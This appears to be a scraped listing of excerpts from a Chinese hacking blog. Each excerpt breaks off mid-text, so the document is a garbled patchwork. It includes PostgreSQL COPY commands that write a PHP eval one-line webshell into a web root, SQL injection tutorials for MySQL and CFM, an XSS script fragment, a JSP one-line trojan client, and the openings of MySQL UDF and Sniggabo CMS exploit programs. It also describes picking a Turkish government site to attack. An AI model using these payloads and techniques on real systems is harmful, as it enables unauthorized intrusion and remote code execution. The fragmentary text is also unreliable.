经过简单修改在Ubuntu下无错误编译

/* ****************************************************************
MySQL_Exploit.c
Exp [-s socket]|[-h host][-p port]][-x]
****************************************************************
*/

#include <stdio.h>
#include <mysql/mysql.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <sys/un.h

MYSQL用户自定义函数的利用（Linux）

Chris Anley [chris@ngssoftware.com] 5th July 2004

        对于注入而言，错误提示是极其重要。所谓错误提示是指和正确页面不同的结果反馈，高手是很重视这个一点的，这对于注入点的精准判断至关重要。本问讨论下关于几类错误和他产生的原理，希望对读者有所帮助。
错误提示主要有逻辑错误和语法错误以及脚本运行错误三类。
一：逻辑错误
简单的例子是1=1 1=2这两个，1=1与1=2页面不同的原理是什么？以$sql = "select * from news where id=$_GET[id]"为例。
select * from news where id=1 and 1=2产生的结果集为NULL，

        有朋友说我怎么不更新日志了，说实话，放假了，都在网吧上网，也没想搞什么。不出意外的话，过几天去zake那里。呵呵，那时候在奉献点微薄之力。

        闲来无事，http://appro.mit.jyu.fi/cgi-bin/printfile.cgi?file=http://appro.mit.jyu.fi/2000/syksy/tietoverkot/luennot/luen

        说是异国世界，原因在于本文脚本的主角是cfm，多见于国外。
        特殊在于注入的是字符型CFM + Mysql(postgresql)
        But why???
        CFM自身有个防御措施，讲一个单引号变成两个，另外很多时候“--”变得不好使。这有什么影响？当然对于注入数字型来说是没有任何影响的。但是字符呢？（以前看的cfm忘完了，只给核心的语句，见谅）

以下下部分有Mickey兄提供

1.在postgresql下导出webshell
create table mickey_shell(shell text not null);
insert into shell values('<?php eval($_POST[cmd]);?>');
copy mickey_shell(shell) to '/var/www/html/mickey.php';

另一种简便的方法：
copy (select '<?php eval($_POST[cmd]);?>') to '/var/www/html/mickey.php'

2.如果没有写权

        这个漏洞我发现久了，今天找漏洞资料的时候无意间翻出来的（主要找一个日本程序的漏洞记录，想和mickey兄共日的）
不管你对后台有什么样的操作，都会弹出操作成功的字样，呵呵。我不喜欢废话，直接看xss.js
Code:
var url = document.location.href;    //获取当前浏览

听说国内不少站点被土耳其人干掉了，圈内也有些人异动。于是决定去看看土耳其的站点。明天就要寄存电脑了，哎，不过想到可以回家也很兴奋。

很快选定一个政府站点，logo上的国旗真是丑陋。

兄弟们好，我是2月。我很喜欢大家这样叫我，嘿嘿。最近断网了，学校服务器关了很多，郁闷。

以前zake老是骂我懒，不做笔记，现在偶就在本机假设了postgresql的注入环境。为大家提供一整套注入postgresql的方案。

        做好比较久了，经历过实战考验，但实战情况多变，本人不能保证。
        注意，服务端代码来自互联网，特此声明！

<html><head><title>JSP一句话木马客户端</title></head>
<div align=center>
<font color=red>2月30日祝朋友们牛年更NB!</font><br><form name=get method=post>
服务端地址<input name=url size=110 type

       前段时间出的可以查看源码的iis验证漏洞，网上还有了php和c两个版本的exp，一些不知情的小菜误解了一些问题，试试过后好多都不行，埋怨作者。
       其实大家都不知道，漏洞造成的影响仅仅是突破了对一些需要验证的iis目录的windows验证，而没有其他的效果。而其他比如上传文件需要开启写入，读取源代码需要开启脚本资源访问。
       大家对利用iis写文件的HTTP请求不陌生，讲一下读取源码。其实这不是漏洞，是微软

漏洞信息来源：www.milw0rm.com
感谢milw0rm的工作人员提供漏洞信息，这个漏洞没有exp，顺手写之。

/*
Sniggabo CMS - Remote SQL Injection Exploit
Date:                11.06.2009
Vulnerability discovered by:    Lidloses_Auge
Admin Panel:             [target]/admin/login.php
Dork:   

POC 来源 http://www.sebug.net/vulndb/11776
实际上没什么用，技术交流而已。代码写得不好，大家多提提意见。

#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>

#define THREADS 30 //默认线程数量

char Exp_Code1[] = "GET / HTTP/1.1\r\n"